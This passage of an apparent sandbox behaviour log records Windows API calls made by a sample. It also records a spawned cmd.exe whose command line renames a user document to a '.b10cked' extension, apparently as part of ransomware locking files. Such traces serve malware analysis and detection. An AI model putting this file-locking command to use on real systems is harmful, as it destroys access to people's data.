[0140.990] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.990] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.990] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.990] GetFileType (hFile=0x4c) returned 0x1 [0140.990] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 
[0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] GetFileType (hFile=0x4c) returned 0x1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] GetFileType (hFile=0x4c) returned 0x1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] GetFileType (hFile=0x4c) returned 0x1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] GetFileType (hFile=0x4c) returned 0x1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.991] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.991] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, 
lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.991] GetFileType (hFile=0x4c) returned 0x1 [0140.991] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] GetFileType (hFile=0x4c) returned 0x1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] GetFileType (hFile=0x4c) returned 0x1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] GetFileType (hFile=0x4c) returned 0x1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] GetFileType (hFile=0x4c) returned 0x1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] GetFileType (hFile=0x4c) returned 0x1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.992] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.992] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType (hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType (hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.993] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.993] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType (hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType (hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType 
(hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] GetFileType (hFile=0x4c) returned 0x1 [0140.993] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.993] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.994] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.994] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x200, lpOverlapped=0x0) returned 1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.994] GetFileType (hFile=0x4c) returned 0x1 [0140.994] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee90*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee90*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eeee0*, 
lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef30*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eef80*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eefd0*, lpNumberOfBytesWritten=0x1ee024*=0x50, lpOverlapped=0x0) returned 1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.995] GetFileType (hFile=0x4c) returned 0x1 [0140.995] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.996] WriteFile (in: hFile=0x4c, lpBuffer=0x1ef020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1ef020*, lpNumberOfBytesWritten=0x1ee024*=0x20, lpOverlapped=0x0) returned 1 [0140.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.996] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.996] ReadFile (in: hFile=0x54, lpBuffer=0x1eee40, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x1ee030, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesRead=0x1ee030*=0x32, lpOverlapped=0x0) returned 1 [0140.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.996] GetFileType (hFile=0x4c) returned 0x1 [0140.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.996] GetFileType (hFile=0x4c) returned 0x1 [0140.996] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.996] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee40*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ee024, lpOverlapped=0x0 | out: lpBuffer=0x1eee40*, lpNumberOfBytesWritten=0x1ee024*=0x32, lpOverlapped=0x0) returned 1 [0140.996] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.996] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ee010 | out: lpNewFilePointer=0x0) returned 1 [0140.996] _close (_FileHandle=4) returned 0 [0140.996] FindNextFileW (in: hFindFile=0x370e90, lpFindFileData=0x1ef0a4 | out: lpFindFileData=0x1ef0a4) returned 0 [0140.997] GetLastError () returned 0x12 [0140.997] FindClose (in: hFindFile=0x370e90 | out: hFindFile=0x370e90) returned 1 [0140.997] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0140.998] _close (_FileHandle=3) returned 0 [0140.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.998] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.998] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0140.998] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.998] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0140.999] SetConsoleInputExeNameW () returned 0x1 [0140.999] GetConsoleOutputCP () returned 0x1b5 [0140.999] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0140.999] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.999] exit (_Code=0) Process: id = "154" 
image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0x12c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14566 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14567 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14568 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14569 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 14570 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14571 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14572 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = 
mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14573 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14574 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 14575 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 15950 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 15951 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 15952 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 15953 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 15954 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 15955 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 15956 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 15957 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type 
= mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 15958 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 15959 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 15960 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 15961 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 15962 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 15963 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 15964 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 15965 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 15966 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 
"c:\\windows\\system32\\msctf.dll") Region: id = 15967 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 15968 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 15969 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 15970 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 15971 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 15972 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 15973 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 210 os_tid = 0x128 [0141.461] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14ff3c | out: lpSystemTimeAsFileTime=0x14ff3c*(dwLowDateTime=0x8e406ac0, dwHighDateTime=0x1d440a9)) [0141.461] GetCurrentProcessId () returned 0x12c [0141.461] GetCurrentThreadId () returned 0x128 [0141.461] GetTickCount () returned 0x2c57f [0141.461] QueryPerformanceCounter (in: lpPerformanceCount=0x14ff34 | out: lpPerformanceCount=0x14ff34*=19825000530) returned 1 [0141.461] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.461] __set_app_type (_Type=0x1) [0141.461] __p__fmode () returned 0x76b331f4 [0141.461] __p__commode () returned 0x76b331fc [0141.461] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.462] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: 
_Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.462] GetCurrentThreadId () returned 0x128 [0141.462] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x128) returned 0x38 [0141.462] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.462] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.462] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.462] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.462] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fecc | out: phkResult=0x14fecc*=0x0) returned 0x2 [0141.462] VirtualQuery (in: lpAddress=0x14ff03, lpBuffer=0x14fe9c, dwLength=0x1c | out: lpBuffer=0x14fe9c*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.462] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fe9c, dwLength=0x1c | out: lpBuffer=0x14fe9c*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.462] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fe9c, dwLength=0x1c | out: lpBuffer=0x14fe9c*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.462] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fe9c, dwLength=0x1c | out: lpBuffer=0x14fe9c*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.462] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fe9c, dwLength=0x1c | out: lpBuffer=0x14fe9c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, 
